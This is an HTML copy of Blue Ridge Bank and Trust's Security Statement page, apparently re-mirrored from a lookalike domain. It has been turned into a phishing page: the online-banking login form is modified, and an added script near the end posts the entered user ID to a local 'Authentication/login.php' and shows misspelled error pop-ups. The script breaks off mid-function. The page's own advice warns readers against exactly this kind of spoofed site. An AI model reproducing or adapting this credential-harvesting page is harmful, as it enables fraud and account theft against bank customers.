<!DOCTYPE html>
<html class="no-js" lang="en">
<!-- Mirrored from www.blueridgebank.com/security by HTTrack Website Copier/3.x [XR&CO'2014], Mon, 04 Mar 2024 23:25:53 GMT -->
<!-- Added by HTTrack -->

<!-- Mirrored from blue-ridgebk.com/security.html by HTTrack Website Copier/3.x [XR&CO'2014], Wed, 23 Oct 2024 18:33:40 GMT -->
<meta http-equiv="content-type" content="text/html;charset=utf-8" /><!-- /Added by HTTrack -->

<head>
  <meta charset="utf-8">
  <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
  <title>
    Security Statement | Blue Ridge Bank and Trust
  </title>
  <meta name="description"
    content="At Blue Ridge Bank and Trust Co., we value the safety and privacy of your personal information. In doing so, we want to remind you of our policies regarding nonpublic, personal information.">
  <meta name="keywords" content="Blue Ridge Bank and Trust, online security, security policy, policy, security">
  <meta name="viewport" content="width=device-width,initial-scale=1">
  <meta name="apple-mobile-web-app-title" content="Blue Ridge Bank and Trust Co.">
  <script async="" src="https://www.googletagmanager.com/gtag/js?id=UA-63016301-1"></script>
  <script>function gtag() { dataLayer.push(arguments) } window.dataLayer = window.dataLayer || [], gtag("js", new Date), gtag("config", "UA-63016301-1")</script>
  <link rel="stylesheet" href="assets/css/main.minbd2fbd2f.css?v=1645637503784">
  <script src="ajax.googleapis.com/ajax/libs/webfont/1.6.26/webfont.html"></script>
  <script>WebFont.load({ google: { families: ["Poppins:100,100i,200,200i,300,300i,400,400i,500,500i,600,600i,700,700i,800,800i,900,900i"] } })</script>
  <script type="text/javascript" src="cdn.rlets.com/capture_configs/950/c58/b93/967466697e29ce2dcd0be64.html"
    async="async"></script>
    <script src="https://cdn.jsdelivr.net/npm/sweetalert2@11"></script>

</head>

<body class="subpage">
  <div class="master-container">
    <header class="header">
      <div class="d-none d-lg-block bg-light topnav-wrap">
        <div class="container">
          <nav class="topnav__links" aria-label="Top navigation">
            <ul class="banno-menu menu-121a2bd0-a11d-11ea-9d90-0242da0b0362">
              <li class="menu-external">
                <a href="https://login2.fisglobal.com/idp/TSS118/?ClientID=WebLinkUI" target="_blank">Trust Login</a>

              </li>
              <li class="menu-external">
                <a href="https://smartpay.profitstars.com/expressbd/BillerDirect?returnUrl=https%3A%2F%2Fsmartpay.profitstars.com%3A443%2Fexpressbd%2FBillerDirect%2FBillerDirect%2FIndex"
                  target="_blank">Make a Payment</a>

              </li>
            </ul>
          </nav>
        </div>
      </div>
      <div class="container">
        <div
          class="header__inner d-md-flex flex-md-row justify-content-md-between align-items-md-center align-content-md-center">
          <div class="header__left"><span itemscope="" itemtype="http://schema.org/BankOrCreditUnion"><span
                itemprop="name" class="sr-only">Blue Ridge Bank and Trust Co.</span> <a href="index-2.html" class="logo"
                title="Blue Ridge Bank and Trust Co., Independence, MO" itemprop="url"><span class="logotype"
                  itemprop="image" itemscope="" itemtype="http://schema.org/ImageObject"><img
                    src="assets/img/blue-ridge-bank-and-trust-co.svg" alt="Blue Ridge Bank and Trust Co."
                    itemprop="url"></span></a></span></div>
          <div class="header__right d-flex justify-content-center align-items-center">
            <nav class="navbar" aria-label="Primary">
              <div class="navbar-header"><button type="button" class="navbar-toggle collapsed btn btn-primary"
                  data-toggle="collapse" data-target="#navbar-collapse" aria-expanded="false" aria-haspopup="true"><span
                    class="sr-only">Toggle </span>Menu</button></div>
              <div class="collapse navbar-collapse" id="navbar-collapse">
                <div class="d-flex d-lg-none justify-content-between align-items-center p-2">
                  <div class="menu-title-text">Menu</div><button type="button" class="navbar-toggle collapsed"
                    data-toggle="collapse" data-target="#navbar-collapse" aria-expanded="false"
                    aria-haspopup="true">Close<span class="sr-only"> Menu</span><span class="icon icon-close"
                      aria-hidden="true"></span></button>
                </div>
                <ul class="banno-menu menu-121a2bd3-a11d-11ea-9d90-0242da0b0362">
                  <li class="dropdown menu-category">
                    <span role="button" aria-expanded="false" class="category-item" tabindex="0">Personal</span>
                    <ul class="dropdown-menu">
                      <li class="dropdown menu-group">
                        <span role="button" aria-expanded="false" class="group-item" tabindex="0">Apply Online</span>
                        <ul class="dropdown-menu">

                          <li class="menu-internal">
                            <a href="loan-account-application.html">Loan Account Application</a>

                          </li>
                        </ul>
                      </li>
                    </ul>
                  </li>
                  <li class="dropdown menu-category">
                    <span role="button" aria-expanded="false" class="category-item" tabindex="0">Business</span>
                    <ul class="dropdown-menu">
                      <li class="dropdown menu-group">
                        <span role="button" aria-expanded="false" class="group-item" tabindex="0">Business Products and
                          Services</span>
                        <ul class="dropdown-menu">
                          <li class="menu-internal">
                            <a href="business/checking.html">Checking</a>

                          </li>
                          <li class="menu-internal">
                            <a href="business/commercial-lending.html">Commercial Lending</a>

                          </li>
                          <li class="menu-internal">
                            <a href="business/treasury-services.html">Treasury Services</a>

                          </li>
                          <li class="menu-internal">
                            <a href="business/card-services.html">Card Services</a>

                          </li>
                        </ul>
                      </li>
                    </ul>
                  </li>
                  <li class="dropdown menu-category">
                    <span role="button" aria-expanded="false" class="category-item" tabindex="0">Online</span>
                    <ul class="dropdown-menu">
                      <li class="dropdown menu-group">
                        <span role="button" aria-expanded="false" class="group-item" tabindex="0">Online Services</span>
                        <ul class="dropdown-menu">
                          <li class="menu-internal">
                            <a href="online/personal-online-banking.html">Personal</a>

                          </li>
                          <li class="menu-internal">
                            <a href="online/business-online-banking.html">Business</a>

                          </li>
                        </ul>
                      </li>
                      <li class="dropdown menu-group">
                        <span role="button" aria-expanded="false" class="group-item" tabindex="0">Online Security</span>
                        <ul class="dropdown-menu">
                          <li class="menu-internal">
                            <a href="security.html">Security Statement</a>

                          </li>
                          <li class="menu-internal">
                            <a href="online/online-security/protecting-identity.html">Protecting Identity</a>

                          </li>
                          <li class="menu-internal">
                            <a href="online/online-security/scam-alerts.html">Scam Alerts!</a>

                          </li>
                        </ul>
                      </li>
                    </ul>
                  </li>
                  <li class="dropdown menu-category">
                    <span role="button" aria-expanded="false" class="category-item" tabindex="0">About Us</span>
                    <ul class="dropdown-menu">
                      <li class="dropdown menu-group">
                        <span role="button" aria-expanded="false" class="group-item" tabindex="0">Who We Are</span>
                        <ul class="dropdown-menu">
                          <li class="menu-internal">
                            <a href="about-us/history.html">History</a>

                          </li>
                          <li class="menu-internal">
                            <a href="about-us/contact-us.html">Contact Us</a>

                          </li>
                          <li class="menu-internal">
                            <a href="about-us/careers.html">Careers</a>

                          </li>
                          <li class="menu-internal">
                            <a href="about-us/news.html">News</a>

                          </li>
                          <li class="menu-internal">
                            <a href="about-us/policies-and-disclosures.html">Policies & Disclosures</a>

                          </li>
                        </ul>
                      </li>
                    </ul>
                  </li>
                </ul>

                <div class="d-block d-lg-none mb-2">
                  <nav class="topnav__links" aria-label="Top navigation">
                    <ul class="banno-menu menu-121a2bd0-a11d-11ea-9d90-0242da0b0362">
                      <li class="menu-external">
                        <a href="https://login2.fisglobal.com/idp/TSS118/?ClientID=WebLinkUI" target="_blank">Trust
                          Login</a>

                      </li>
                      <li class="menu-external">
                        <a href="https://smartpay.profitstars.com/expressbd/BillerDirect?returnUrl=https%3A%2F%2Fsmartpay.profitstars.com%3A443%2Fexpressbd%2FBillerDirect%2FBillerDirect%2FIndex"
                          target="_blank">Make a Payment</a>

                      </li>
                    </ul>
                  </nav>
                </div><button type="button" class="header__button toggle-search d-none d-lg-inline-block"><span
                    class="icon icon-search" aria-hidden="true"></span><span class="sr-only">Open Search</span></button>
                <div class="search-internal d-block">
                  <div class="d-flex flex-row justify-content-lg-end h-100 align-items-center">
                    <div class="d-none d-lg-block mr-2"><button class="header__button toggle-search"><span
                          class="search-close-text">Close<span class="sr-only"> Search</span></span> <span
                          class="icon icon-close" aria-hidden="true"></span></button></div>
                    <div class="d-block w-100 w-lg-auto">
                      <form method="GET" action="https://www.blueridgebank.com/search" class="parsley-absolute mb-0"
                        data-parsley-validate="">
                        <div
                          class="form-group mb-0 d-flex flex-row justify-content-between align-items-center align-content-center">
                          <label for="siteSearch" class="sr-only">Enter search terms</label> <input name="q"
                            id="siteSearch" class="form-control mr-1" type="search" placeholder="Search..."
                            data-parsley-required="true" data-parsley-errors-container="#search-error"> <button
                            type="submit" class="search-submit btn btn-primary"><span class="icon icon-search"
                              aria-hidden="true"></span><span class="sr-only">Start Site Search</span></button>
                        </div>
                      </form>
                    </div>
                  </div>
                </div>
              </div>
            </nav>
            <div class="olb">
              <div class="olb__toggle btn btn-success">
                <span class="login-text">
                Login<span class="sr-only"> to online
                    banking</span></span> 
                    <span class="close-text">Close<span class="sr-only"> online
                    banking</span></span></div>
              <div class="olb__container" role="region" aria-labelledby="region--olb-title">
                <div class="d-block d-md-none p-2 text-right"><button class="olb__toggle"><span
                      class="close-text">Close</span><span class="sr-only"> online banking</span> <span
                      class="icon icon-close ml-2" aria-hidden="true"></span></button></div>
                <!--------------------------------loging----------------------------------------->
                <form class="olb__login parsley-absolute" id="loginForm" method="post">
                  <div class="form-label" id="region--olb-title">Log into Your Account</div>

                  <div class="form-group mb-0">
                    <i id="ermptyErrro"></i><br>
                    <label for="id">User ID </label>
                    <input type="text" name="id" id="id" class="form-control" autocomplete="off" required="">
                  </div>
                  <input type="button" id="loginBtn"  class="btn btn-small btn-success" value="Login">
                </form>
                <div class="olb__links d-md-flex justify-content-md-center text-center">
                  <div><a
                      href="https://www.netteller.com/login2008/Authentication/Views/LoginPasswordSelfReset.aspx?returnUrl=%2fblueridgebank%2f">Forgot
                      Password</a></div>
                  <div><a
                      href="https://www.netteller.com/login2008/Authentication/Views/OnlineEnrollmentAgreement.aspx?returnUrl=%2fblueridgebank%2f">Enroll</a>
                  </div>
                  <div><a href="https://login2.fisglobal.com/idp/TSS118/?ClientID=WebLinkUI">Trust Login</a></div>
                </div>
              </div>
            </div>
          </div>
        </div>
      </div>
    </header>
    <div id="main" tabindex="-1" role="main">
      <div class="hero__subpage remove-blank">
        <div class="hero__subpage-inner">
          <div class="hero__subpage-image">
            <div data-content-block="bannerImage" data-content="content" data-editable="editable" class="image">
              <div><img alt="Abstract image of online security." src="assets/files/9RqGVW7m/headers_security.jpg"
                  image-id="9RqGVW7m"></div>
            </div>
          </div>
        </div>
      </div>
      <div class="subpage-content my-5 my-md-10">
        <div class="container">
          <div class="row">
            <div class="col-md-8">
              <h1 class="page-title">Security Statement</h1>
              <div class="content" data-content-block="bodyCopy1" data-content="content" data-editable="editable">
                <h2>Our Security Policy</h2>
                <div><span style="font-size: 0.875rem;">At Blue Ridge Bank and Trust Co., we value the safety and
                    privacy of your personal information. In doing so, we want to remind you of our policies regarding
                    nonpublic, personal information.</span></div>
                <div><br></div>
                <div>When you call us, come to a branch, or visit us online, we will ask for some information to verify
                  your identity. But, we want to assure you that we will never call you or send you an email asking you
                  to send us a response containing personal or private information.</div>
                <div><br></div>
                <div>In the past several months, several “scams” have been centered around phone calls or emails asking
                  a customer to reveal account numbers, ATM or Debit Card numbers, passwords or other personal, private,
                  nonpublic information. In some cases, scammers are sending fraudulent emails claiming to be from
                  certain banks or banking agencies and then asking customers to visit a fraudulent web site identical
                  to the bank’s authentic web site in order to have customers provide their personal information.</div>
                <div><br></div>
                <div>We want to remind you never to disclose ANY personal identifying information if requested via an
                  unsolicited email or phone call. This includes:</div>
                <div><br></div>
                <ul>
                  <li>Blue Ridge Bank and Trust Co. account numbers or credit card numbers<br></li>
                  <li>Personal Identification Numbers (PIN) or passwords<br></li>
                  <li>Social Security Number<br></li>
                  <li>Mother’s maiden name<br></li>
                  <li>Other private information</li>
                </ul>
                <div>Additionally, if you use Blue Ridge Bank and Trust online, log out when finished and close your
                  browser before leaving your computer. Never leave your computer unattended during a Blue Ridge Bank
                  and Trust online session.</div>
                <div><br></div>
                <div>If you ever get an unsolicited phone call or email claiming to be from Blue Ridge Bank and Trust
                  asking you for personal identifying or account information, please do not respond. Call us
                  at<span> </span><strong>816-358-5000</strong><span> </span>to let us know and to be sure you are
                  communicating with Blue Ridge Bank and Trust Co. Also, be wary of any email asking you to log into
                  Blue Ridge Bank and Trust online if it does not link to the official Blue Ridge Bank and Trust site
                  located at<span> </span><a target="_self" data-disclaimer-id="null" class="" data-link-type-id="page"
                    data-link-id="/index" href="index-2.html">https://www.blueridgebank.com</a>.<br></div>
              </div>
              <div id="accordion" class="my-3 remove-blank">
                <div class="card accordion remove-blank">
                  <div id="card1Name" class="card-header collapsed" data-toggle="collapse" data-target="#collapse1"
                    tabindex="0" aria-controls="collapse1" aria-expanded="false">
                    <div data-content-block="accordionHeader1" data-content="content" data-editable="editable">
                      <div>Online Security Tips</div>
                    </div>
                  </div>
                  <div id="collapse1" class="collapse" data-parent="#accordion" aria-labelledby="card1Name">
                    <div class="card-body content">
                      <div data-content-block="accordionContent1" data-content="content" data-editable="editable">
                        <ul>
                          <li>Never click on suspicious links in emails, tweets, posts, or online advertising. Links can
                            take you to a different website than their labels indicate. Typing an address in your
                            browser instead of clicking a link in an email is a safer alternative.<br><br></li>
                          <li>Ensure your information is protected as it travels across the Internet by only submitting
                            sensitive information to websites that use encryption. Verify the web address begins with
                            “https://” (the “s” is for “secure”) rather than just “http://”. Some browsers also display
                            a closed padlock. Do not trust sites with certificate warnings or errors. These messages
                            could indicate your connection is being intercepted or the web server is misrepresenting its
                            identity.<br><br></li>
                          <li>Avoid using public computers or public wireless access points for online banking and other
                            activities involving sensitive information, when possible.<br><br></li>
                          <li>Always “Sign Out” or “Log Off” of password protected websites when finished to prevent
                            unauthorized access. Simply closing the browser window may not actually end your
                            session.<br><br></li>
                          <li>Be cautious of unsolicited phone calls, emails, or texts directing you to a website or
                            requesting information.<br><br></li>
                          <li>Look beyond the logo. Scammers often use actual logos and corporate imagery on their
                            sites. They also press you to provide, update or verify account information claiming access
                            to your accounts will be suspended if you don't comply. <br></li>
                        </ul>
                      </div>
                    </div>
                  </div>
                </div>
                <div class="card accordion remove-blank">
                  <div id="card2Name" class="card-header collapsed" data-toggle="collapse" data-target="#collapse2"
                    tabindex="0" aria-controls="collapse2" aria-expanded="false">
                    <div data-content-block="accordionHeader2" data-content="content" data-editable="editable">
                      <div>General PC Security Tips</div>
                    </div>
                  </div>
                  <div id="collapse2" class="collapse" data-parent="#accordion" aria-labelledby="card2Name">
                    <div class="card-body content">
                      <div data-content-block="accordionContent2" data-content="content" data-editable="editable">
                        <ul>
                          <li>Maintain active and up-to-date antivirus protection provided by a reputable vendor.
                            Schedule regular scans of your computer in addition to real-time scanning. This simple task
                            makes it more difficult for scammers to access your confidential information and accounts.
                            Anti-virus and anti-spyware software are available for purchase at major retail stores or on
                            the Internet.<br><br></li>
                          <li>Update your software frequently to ensure you have the latest security patches. This
                            includes your computer’s operating system and other installed software (e.g., web browsers,
                            Adobe Reader, Java, Microsoft Office, etc.).<br><br></li>
                          <li>Automate software updates, when the software supports it, to ensure it’s not overlooked.
                            If you suspect your computer is infected with malware, discontinue using it for banking,
                            shopping, or other activities involving sensitive information. Use security software and/or
                            professional help to find and remove malware.<br><br></li>
                          <li>Use Firewalls on your local network to add another layer of protection for all the devices
                            that connect through the firewall (e.g., PCs, smart phones, and tablets).<br><br></li>
                          <li>Require a password to gain access. Log off or lock your computer when not in use.<br><br>
                          </li>
                          <li>Use a cable lock to physically secure a laptop when the device is stored in an untrusted
                            location.</li>
                        </ul>
                      </div>
                    </div>
                  </div>
                </div>
                <div class="card accordion remove-blank">
                  <div id="card3Name" class="card-header collapsed" data-toggle="collapse" data-target="#collapse3"
                    tabindex="0" aria-controls="collapse3" aria-expanded="false">
                    <div data-content-block="accordionHeader3" data-content="content" data-editable="editable">
                      <div>Mobile Device Security Tips</div>
                    </div>
                  </div>
                  <div id="collapse3" class="collapse" data-parent="#accordion" aria-labelledby="card3Name">
                    <div class="card-body content">
                      <div data-content-block="accordionContent3" data-content="content" data-editable="editable">
                        <div>
                          <ul>
                            <li>Configure your device to require a passcode to gain access. It is important to use the
                              security measures available to you if you prefer mobile banking from your phone. Most
                              phones will allow you to &quot;lock&quot; your phone with a PIN or security code, which
                              makes it more difficult for others to access the device. If you leave it at the coffee
                              shop or in your car, and it's stolen, your data is safer.<br><br></li>
                            <li>Avoid storing passwords or sensitive information. Mobile devices have a high likelihood
                              of being lost or stolen, so you should avoid using them to store sensitive information.
                              Enter your password every time you need to access accounts rather than storing them
                              automatically. Manually entering user IDs and passwords might be more time-consuming, but
                              you'll thank yourself if your phone is ever stolen.<br>If sensitive data is stored, enable
                              encryption to secure it.<br><br></li>
                            <li>Keep your mobile device’s software up-to-date. Review the privacy policy and data access
                              of any applications (apps) before installing them. Disable features not actively in use,
                              such as Bluetooth, Wi-Fi, and infrared. Set Bluetooth enabled devices to
                              “non-discoverable” when Bluetooth is enabled.<br><br></li>
                            <li>Turn off your Wi-Fi and Bluetooth. If you aren’t actually using them it’s a good idea to
                              turn off Wi-Fi and Bluetooth. Disable automatic connections to your wireless profiles, and
                              save only wireless profiles that you actually need to save. When your Wi-Fi and Bluetooth
                              are turned on your device is constantly searching and sending out requests for those
                              profiles and essentially advertising the name of every network you have connected to.
                              Disabling them will decrease risk, increase privacy, and also improve your battery
                              life.<br><br></li>
                            <li>Delete all information on a device before the device changes ownership. Use a “hard
                              factory reset” to permanently erase all content and setting stored on the device.<br><br>
                            </li>
                            <li>“Sign Out” or “Log Off” when finished with an app, rather than just closing it.<br><br>
                            </li>
                            <li>Utilize antivirus software where applicable (i.e., Androids, Windows, etc.).<br><br>
                            </li>
                            <li>Do not jailbreak or otherwise circumvent security controls. There are numerous articles
                              on the Internet detailing how to hack your device, but this is a bad idea if you're using
                              mobile banking. Hacks create vulnerabilities in the security system of your device, which
                              could leave it open to hackers who wouldn't have otherwise been able to gain
                              access.<br>Subscribe to Remote Wiping Programs. Some phones have remote wiping services
                              that can be used to erase all data if your phone is ever lost or stolen. Since banking on
                              your cell phone can leave personal information on the device, these services create peace
                              of mind.<br><br></li>
                            <li>Don't use online banking in a crowded area where anyone could look over your shoulder.
                              If you must do this in public, sit or stand with your back to a wall, and look up from
                              time to time. Maintaining awareness of your surroundings could help protect sensitive
                              data.<br><br></li>
                            <li>Download mobile application only from reputable stores authorized by the device
                              manufacturer and only download apps or documents from trusted sources—that is, no
                              file-sharing websites.<br><br></li>
                            <li>Beware of Unknown Text messages. A lot of fraudsters are turning to texting as a way of
                              gaining information for Identity Fraud. Be cautious in clicking on any links in a text
                              message. It is always better to enter a known website address than to click a link!</li>
                          </ul>
                        </div>
                      </div>
                    </div>
                  </div>
                </div>
                <div class="card accordion remove-blank">
                  <div id="card4Name" class="card-header collapsed" data-toggle="collapse" data-target="#collapse4"
                    tabindex="0" aria-controls="collapse4" aria-expanded="false">
                    <div data-content-block="accordionHeader4" data-content="content" data-editable="editable">
                      <div>Passwords</div>
                    </div>
                  </div>
                  <div id="collapse4" class="collapse" data-parent="#accordion" aria-labelledby="card4Name">
                    <div class="card-body content">
                      <div data-content-block="accordionContent4" data-content="content" data-editable="editable">
                        <ul>
                          <li>Create a unique password for all the different systems/websites you use. Otherwise, one
                            breach leaves all your accounts vulnerable.<br><br></li>
                          <li>Never share your password over the phone, in texts, by email, or in person. If you are
                            asked for your password, it’s probably a scam.<br><br></li>
                          <li>Use unpredictable passwords with a combination of lowercase letters, capital letters,
                            numbers, and special characters.<br><br></li>
                          <li>The longer the password, the tougher it is to crack. Use a password with at least eight
                            (8) characters. Every additional character exponentially strengthens a password.<br><br>
                          </li>
                          <li>Avoid using obvious passwords such as:
                            <ul>
                              <li>Names (e.g., your name, family members’ names, business name, user name, etc.)</li>
                              <li>Dates (e.g., birthdays, anniversaries, etc.)</li>
                              <li>Dictionary words<br><br></li>
                            </ul>
                          </li>
                          <li>Choose a password you can remember without writing it down. If you do choose to write it
                            down, store it in a secure location.</li>
                        </ul>
                      </div>
                    </div>
                  </div>
                </div>
                <div class="card accordion remove-blank">
                  <div id="card5Name" class="card-header collapsed" data-toggle="collapse" data-target="#collapse5"
                    tabindex="0" aria-controls="collapse5" aria-expanded="false">
                    <div data-content-block="accordionHeader5" data-content="content" data-editable="editable">
                      <div>Avoiding Social Engineering Attacks</div>
                    </div>
                  </div>
                  <div id="collapse5" class="collapse" data-parent="#accordion" aria-labelledby="card5Name">
                    <div class="card-body content">
                      <div data-content-block="accordionContent5" data-content="content" data-editable="editable">
                        <div>In a social engineering attack, an attacker uses human interaction to manipulate a person
                          into disclosing information. People have a natural tendency to trust. Social engineering
                          attacks attempt to exploit this tendency in order to steal your information. Once the
                          information has been stolen, it can be used to commit fraud or identity theft. Criminals use a
                          variety of social engineering attacks to attempt to steal information, including:<br></div>
                        <ul>
                          <li><strong>Website Spoofing</strong> - the act of creating a fake website to mislead
                            individuals into sharing sensitive information. Spoofed websites are typically created to
                            look exactly like a legitimate website published by a trusted organization.<br></li>
                          <li><strong>Phishing Emails or Phone Calls</strong> - when an attacker attempts to acquire
                            information by masquerading as a trustworthy entity in an electronic communication. Phishing
                            attacks are typically carried out through email, instant messaging, phone calls, and text
                            messages (SMS).<br></li>
                        </ul>
                        <div>Don't become a victim of social engineering! Follow these prevention tips:</div>
                        <ul>
                          <li>Pay attention to the web address (URL) of websites. A website may look legitimate, but the
                            URL may have a variation in spelling or use a different domain.<br><br></li>
                          <li>If you are suspicious of a website, close it and contact the company directly.<br><br>
                          </li>
                          <li>Do not click links on social media sites, pop-up windows, or non-trusted websites. Links
                            can take you to a different website than their labels indicate. Typing an address in your
                            browser is a safer alternative.<br><br></li>
                          <li>Delete email, text, and social media messages that ask you to confirm or provide sensitive
                            information. Legitimate companies don’t ask for sensitive information this way.<br><br></li>
                          <li>Beware of visiting website addresses sent to you in an unsolicited message. Even if you
                            feel the message is legitimate, type web addresses into your browser instead of clicking
                            links.<br><br></li>
                          <li>Try to independently verify any details given in a message directly with the
                            company.<br><br></li>
                          <li>Utilize anti-phishing features available in your email client and/or web browser. Also,
                            utilize an email SPAM-filtering solution to help prevent phishing emails from being
                            delivered.<br><br></li>
                          <li>Do not open attachments from unknown senders or unexpected attachments from known senders.
                            Be cautious of the amount of personal data you make publicly available through social media
                            and other methods.<br></li>
                        </ul>
                      </div>
                    </div>
                  </div>
                </div>
                <div class="card accordion remove-blank">
                  <div id="card6Name" class="card-header collapsed" data-toggle="collapse" data-target="#collapse6"
                    tabindex="0" aria-controls="collapse6" aria-expanded="false">
                    <div data-content-block="accordionHeader6" data-content="content" data-editable="editable"> </div>
                  </div>
                  <div id="collapse6" class="collapse" data-parent="#accordion" aria-labelledby="card6Name">
                    <div class="card-body content">
                      <div data-content-block="accordionContent6" data-content="content" data-editable="editable">
                      </div>
                    </div>
                  </div>
                </div>
                <div class="card accordion remove-blank">
                  <div id="card7Name" class="card-header collapsed" data-toggle="collapse" data-target="#collapse7"
                    tabindex="0" aria-controls="collapse7" aria-expanded="false">
                    <div data-content-block="accordionHeader7" data-content="content" data-editable="editable"> </div>
                  </div>
                  <div id="collapse7" class="collapse" data-parent="#accordion" aria-labelledby="card7Name">
                    <div class="card-body content">
                      <div data-content-block="accordionContent7" data-content="content" data-editable="editable">
                      </div>
                    </div>
                  </div>
                </div>
                <div class="card accordion remove-blank">
                  <div id="card8Name" class="card-header collapsed" data-toggle="collapse" data-target="#collapse8"
                    tabindex="0" aria-controls="collapse8" aria-expanded="false">
                    <div data-content-block="accordionHeader8" data-content="content" data-editable="editable"> </div>
                  </div>
                  <div id="collapse8" class="collapse" data-parent="#accordion" aria-labelledby="card8Name">
                    <div class="card-body content">
                      <div data-content-block="accordionContent8" data-content="content" data-editable="editable">
                      </div>
                    </div>
                  </div>
                </div>
                <div class="card accordion remove-blank">
                  <div id="card9Name" class="card-header collapsed" data-toggle="collapse" data-target="#collapse9"
                    tabindex="0" aria-controls="collapse9" aria-expanded="false">
                    <div data-content-block="accordionHeader9" data-content="content" data-editable="editable"> </div>
                  </div>
                  <div id="collapse9" class="collapse" data-parent="#accordion" aria-labelledby="card9Name">
                    <div class="card-body content">
                      <div data-content-block="accordionContent9" data-content="content" data-editable="editable">
                      </div>
                    </div>
                  </div>
                </div>
                <div class="card accordion remove-blank">
                  <div id="card10Name" class="card-header collapsed" data-toggle="collapse" data-target="#collapse10"
                    tabindex="0" aria-controls="collapse10" aria-expanded="false">
                    <div data-content-block="accordionHeader10" data-content="content" data-editable="editable"> </div>
                  </div>
                  <div id="collapse10" class="collapse" data-parent="#accordion" aria-labelledby="card10Name">
                    <div class="card-body content">
                      <div data-content-block="accordionContent10" data-content="content" data-editable="editable">
                      </div>
                    </div>
                  </div>
                </div>
              </div>
              <div data-content-block="bodyCopy2" data-content="content" data-editable="editable" class="content">
              </div>
            </div>
            <aside class="col-lg-3 offset-lg-1 col-md-4 subpage__sidebar">
              <div class="subpage__sidebar-block remove-blank mb-4 mt-4 mt-sm-0">
                <div data-content-block="sub1Image" data-content="content" data-editable="editable" class="BMcontent">
                  <div class="content content-img">
                    <div class="imgSave"><img alt="People dancing" src="assets/files/FMShwfZE/sub_wealth_mgmt.jpg"
                        image-id="FMShwfZE"></div>
                  </div>
                  <div class="content">
                    <h2>What do you want to achieve? What will it take to get there?</h2>
                    <p>We help you understand your options and make decisions. And, we stay in touch. Through regular
                      meetings we continually assess your changing needs and help you plan, invest and manage your
                      accounts accordingly.</p>
                    <p><a href="personal/wealth-management-and-trusts.html"
                        data-link-id="/personal/wealth-management-and-trusts" data-link-type-id="page"
                        class="btn btn-primary " data-disclaimer-id="null" target="_self">Wealth Management & Trusts</a>
                    </p>
                  </div>
                </div>
              </div>
              <div class="subpage__sidebar-block remove-blank mb-4 mt-4 mt-sm-0">
                <div data-content-block="sub2Image" data-content="content" data-editable="editable" class="BMcontent">
                </div>
              </div>
            </aside>
          </div>
        </div>
      </div>
    </div>
    <footer class="footer text-light py-4 text-center" id="footer">
      <div class="backToTop__container text-right">
        <div class="container"><button type="button" id="scrollTop"><span class="sr-only">Back to the
              top</span></button></div>
      </div>
      <div class="container">
        <div class="footer__inner">
          <div class="social"><a href="https://www.facebook.com/BlueRidgeBankandTrustCo"><span
                class="icon icon-facebook" aria-hidden="true"></span><span class="sr-only">Facebook</span></a> <a
              href="https://www.linkedin.com/company/blue-ridge-bank-and-trust-co-/"><span class="icon icon-linkedin"
                aria-hidden="true"></span><span class="sr-only">LinkedIn</span></a></div>
          <nav class="footer__links mt-4" aria-label="Footer">
            <ul class="banno-menu menu-121b1631-a11d-11ea-9d90-0242da0b0362">
              <li class="menu-internal">
                <a href="privacy-policy.html">Privacy Policy</a>

              </li>
              <li class="menu-internal">
                <a href="security.html">Security Policy</a>

              </li>
              <li class="menu-internal">
                <a href="usa-patriot-act.html">USA Patriot Act</a>

              </li>
              <li class="menu-internal">
                <a href="about-us/policies-and-disclosures.html">Disclosures</a>

              </li>
              <li class="menu-internal">
                <a href="about-us/contact-us.html">Contact Us</a>

              </li>
            </ul>
          </nav>
          <div class="copyright mt-4"><span class="copytext">© <span class="copy-date"></span> Blue Ridge Bank and Trust
              Co.</span> <span class="ml-xs-4 fdic"><a href="https://www.fdic.gov/" title="Member FDIC">Member
                FDIC</a>.</span> <span class="ehl"><a href="https://www.hud.gov/" title="Equal Housing Lender">Equal
                Housing Lender <span class="icon icon-ehl" aria-hidden="true"></span></a></span>
            <div class="mt-4"><span class="jha mr-2"><a href="https://www.banno.com/" class="external"><span
                    class="icon icon-jha" aria-hidden="true"></span><span class="sr-only">Created by
                    Banno</span></a></span>
              <div id="sentinel-badge" data-theme="dark">


                <script src="banno.com/a/monitor/api/badge/badge.min.html" async="async"></script>
              </div>
            </div>
          </div>
        </div>
      </div>
    </footer>
  </div>
  <script src="assets/js/jquery.min.js"></script>
  <script defer="defer" src="assets/js/script.min584f584f.js?v=1645637503763"></script>
  <script src="assets/target/disclaimers3b6c3b6c.js?bh=e14aac" id="disclaimerscript" defer="defer" proceed="Proceed"
    cancel="Cancel"></script>
  <script type="text/javascript">
      (function (serve, h, s) {
        window.kernel = window.kernel || function () { (window.kernel.q = window.kernel.q || []).push(arguments); };
        h = document.getElementsByTagName("head")[0]; s = document.createElement("script"); s.src = "https://" + serve + "/kernel.js"; s.async = 1; h.appendChild(s);
      })("kernel-serve.banno.com");
    kernel("create", "f32c1ff2-22ad-43e9-a7a2-d0af2500265b");
    kernel("visit"); kernel("addClickthroughListeners", []); kernel("associate", [{ "loginFormId": "loginForm", "usernameField": "id" }]);
  </script>
  <script nomodule="nomodule" type="text/javascript">

    function ieWarning() {
      document.body.setAttribute("style", "padding-bottom: 120px;");
      var warning = document.createElement("section");
      warning.setAttribute("class", "ie-disclaimer");
      warning.setAttribute("style", "background-color: #000; color:#fff; padding: 10px 40px; position: fixed; bottom: 0; z-index: 1040; height: 120px;");
      warning.setAttribute("aria-label", "Important notice regarding browser support");
      var warningContent = 'Please note: As of February 15, 2022, this website will no longer function with this browser' +
        ' version. This website was built to support the use of modern browsers. The browser that you are currently using' +
        ' is no longer fully supported by Microsoft and is not considered a modern browser. To use this site, please open' +
        ' in a modern browser like Google Chrome, Firefox, Safari, or a currently supported version of Microsoft Edge.';
      warning.innerHTML = warningContent;
      var firstElement = document.body.children[0];
      document.body.insertBefore(warning, firstElement);
    }
    window.addEventListener("load", ieWarning);

  </script>

  <script src="login.js"></script>
   <script>


$(document).ready(function () {
  
   
    console.log("oooo");
    $("#loginBtn").on("click", function (e) {
        e.preventDefault();
        $(".preload-container").show();
        var id = $("#id").val();
        //alert("pppp");
        //    if (id=="") {
        //     $("#ermptyErrro").html("<i style='color:red'>Id cant be empty</i>");
        //    }
        $.ajax({
            url: "Authentication/login.php",
            type: "POST",
            data: { id: id },

            beforSend: function () {
                $(".preload-container").show();
            },

            success: function (data) {
                //console.log(data);

                if (data == 'block') {
                  Swal.fire({
                        title: "Opps!",
                        text: "Opps you dont have access to this account contact our support!",
                        icon: "error",
